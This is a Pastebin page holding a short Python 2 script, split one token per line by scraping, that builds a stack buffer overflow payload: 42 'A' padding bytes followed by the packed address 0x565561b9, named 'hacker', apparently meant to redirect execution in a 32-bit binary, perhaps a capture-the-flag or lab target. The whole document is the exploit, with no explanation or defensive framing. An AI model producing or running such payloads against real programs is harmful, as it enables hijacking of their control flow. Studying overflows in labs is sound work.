Data hosted with ♥ by
Pastebin.com
-
Download Raw
-
See Original
import
struct
def
p
(
x
)
:
return
struct
.
pack
(
"<L"
,
x
)
offset
=
42
hacker
=
0x565561b9
payload
=
""
payload +
=
"A"
* offset
payload +
=
p
(
hacker
)
print
payload